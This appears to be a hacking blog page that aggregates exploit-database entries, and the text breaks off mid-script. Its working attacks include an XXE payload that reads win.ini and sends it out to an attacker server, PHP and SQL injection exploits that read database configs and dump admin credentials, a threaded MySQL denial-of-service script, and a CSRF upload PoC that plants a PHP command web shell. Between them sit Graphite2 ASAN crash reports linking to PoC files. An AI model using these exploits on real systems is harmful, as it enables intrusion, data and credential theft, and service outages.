CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863117859
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=752
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
=================================================================
==27862==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000be45 at pc 0x0000005f3354 bp 0x7ffe1a7ac5b0 sp 0x7ffe1a7ac5a8
READ of size 4 at 0x61200000be45 thread T0
#0 0x5f3353 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) graphite/src/TtfUtil.cpp:1092:40
#1 0x4fa415 in smp_subtable(graphite2::Face::Table const&) graphite/src/CmapCache.cpp:55:9
#2 0x4fa859 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:95:29
#3 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#4 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#5 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#6 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#7 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#8 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
0x61200000be45 is located 1 bytes to the right of 260-byte region [0x61200000bd40,0x61200000be44)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36
#3 0x4fa793 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#9 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/TtfUtil.cpp:1092:40 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*)
Shadow bytes around the buggy address:
0x0c247fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff97a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff97c0: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa
0x0c247fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==27862==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39861.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=755
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
==19167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dff1 at pc 0x000000553c7d bp 0x7ffc6c2c7100 sp 0x7ffc6c2c70f8
READ of size 1 at 0x60e00000dff1 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553be8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#2 0x56d7e3 in unsigned short be::peek<unsigned short>(void const*) graphite/src/./inc/Endian.h:55:18
#3 0x5f2bad in graphite2::TtfUtil::CmapSubtable4NextCodepoint(void const*, unsigned int, int*) graphite/src/TtfUtil.cpp:1042:16
#4 0x4fce35 in bool cache_subtable<&graphite2::TtfUtil::CmapSubtable4NextCodepoint, &graphite2::TtfUtil::CmapSubtable4Lookup>(unsigned short**, void const*, unsigned int) graphite/src/CmapCache.cpp:65:33
#5 0x4fb097 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:107:14
#6 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#7 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#8 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#9 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#10 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#11 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60e00000dff1 is located 0 bytes to the right of 145-byte region [0x60e00000df60,0x60e00000dff1)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55d42b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f0d1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:281:36
#3 0x4faad3 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#9 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c1c7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c1c7fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa
0x0c1c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19167==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39862.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756
We have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest -demand -cache /path/to/file
Below are three unique ASAN reports that we have triggered.
--- cut ---
==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0)
#0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
==1191==ABORTING
--- cut ---
--- cut ---
==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68
READ of size 1 at 0x61b00001fb95 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1199==ABORTING
--- cut ---
--- cut ---
==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838
READ of size 2 at 0x60400000db3a thread T0
#0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27
#1 0x57d0a7 in graphite2::_utf_iterator<unsigned short const>::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74
#2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55a24a in unsigned short* graphite2::gralloc<unsigned short>(unsigned long) graphite/src/./inc/Main.h:88:28
#2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&)
Shadow bytes around the buggy address:
0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd
0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa
0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1315==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39863.zip
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
Exploit :
<?php
//read db config file
$post_data = 'tpl=../../private/config/db.php';//change read file path
$host = "www.server.local";//change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if(!$socket){
echo ' error: ' . $errno . ' ' . $errstr;
die;
}else{
//change [demo/en] path server
$path = "/demo/en/";
$http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
$http .= "Host: $host\r\n";
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http .= "Content-length: " . strlen($post_data) . "\r\n";
$http .= "Connection: close\r\n\r\n";
$http .= $post_data . "\r\n\r\n";
fwrite($socket, $http);
$contents = "";
while (!feof($socket)) {
$contents .= fgets($socket, 4096);
}
fclose($socket);
$e = explode('Content-Type: text/html',$contents);
print $e[1];
}
?>
# Exploit Title: Property Agent RealeState Script Sql Injection
# Date: 2015-05-27
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/php-realestate-script/
# Version: 4.9.0
Exploit :
http://server/[path]/single.php?view_id=-99999+[SQl+Command]
Test :
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login
Admin Panel : http://server/admin/
Username : admin
Password : inetsol
#!/usr/bin/env python
# Title: MySQL Procedure Analyse DoS Exploit
# Author: Osanda Malith Jayathissa (@OsandaMalith)
# E-Mail: osanda[cat]unseen.is
# Version: Vulnerable upto MySQL 5.5.45
# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
# This exploit is compatible with both Python 3.x and 2.x
# CVE: CVE-2015-4870
from __future__ import print_function
import threading
import time
import sys
import os
try:
import urllib.request as urllib2
import urllib.parse as urllib
except ImportError:
import urllib2
import urllib
try: input = raw_input
except NameError: pass
host = "http://host/xxx.php?id=1'"
payload = " procedure analyse((select*from(select 1)x),1)-- -"
payload = urllib.quote(payload)
url = host + payload
req = urllib2.Request(url)
req.add_header('Accept', '*/*')
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
req.add_header('Connection', '')
req.add_header('Content-type', 'text/xml')
cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')
class DoS(threading.Thread):
def run(self):
print("{0} started!".format(self.getName()))
for i in range(100):
urllib2.urlopen(req)
time.sleep(.2)
print("{0} finished!".format(self.getName()))
def banner():
print ('''
____ _____ __
/'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __
\\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
\\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
\\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
/\\___/
\\/__/
____ ____
/\\ _`\\ /\\ _`\\
\\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
\\ \\ \\ \\ \\ / __`\\/_\\__ \\
\\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
\\ \\____/\\ \\____/\\ `\\____\\
\\/___/ \\/___/ \\/_____/
[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
[*] E-Mail: osanda[cat]unseen.is
[*] Website: http://osandamalith.wordpress.com
[!] Author takes no responsibility of any damage you cause
[!] Strictly for Educational purposes only
''')
print("[*] Host: {0}".format(host))
input("\n\t[-] Press Return to launch the attack\n")
def _start():
try:
cls()
banner()
for i in range(10000):
thread = DoS(name = "[+] Thread-{0}".format(i + 1))
thread.start()
time.sleep(.1)
except KeyboardInterrupt:
print ('\n[!] Ctrl + C detected\n[!] Exiting')
sys.exit(0)
except EOFError:
print ('\n[!] Ctrl + D detected\n[!] Exiting')
sys.exit(0)
if __name__ == '__main__':
_start()
# Exploit Title: real-estate classified script Sql Injection
# Date: 2015-05-29
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/open-source-real-estate-script/
# Version: 3.6.0
Exploit :
http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]
Test :
http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
Admin Panel : http://server/admin/
<!DOCTYPE html>
<!--
FlatPress 1.0.3 CSRF Arbitrary File Upload
Vendor: Edoardo Vacchi
Product web page: http://www.flatpress.org
Affected version: 1.0.3
Summary: FlatPress is a blogging engine that saves your posts as
simple text files. Forget about SQL! You just need some PHP.
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Uploader script using 'upload[]' POST parameter
which allows of arbitrary files being uploaded in '/fp-content/attachs'
directory. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform actions with
administrative privileges if a logged-in user visits a malicious
web site resulting in execution of arbitrary PHP code by uploading
a malicious PHP script file and execute system commands.
Tested on: Apache/2.4.10
PHP/5.6.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5328
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
04.04.2016
-->
<html>
<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
<body>
<script type="text/javascript">
function exec(){
var command = document.getElementById("exec");
var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
var cmdexec = command.value;
window.open(url+cmdexec,"ZSL_iframe");
}
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
"\r\n" +
"5a462c73ac\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
"\r\n" +
"/flatpress/admin.php?p=uploader\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_REQUEST[\'cmd\']);\r\n" +
"?\x3e\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
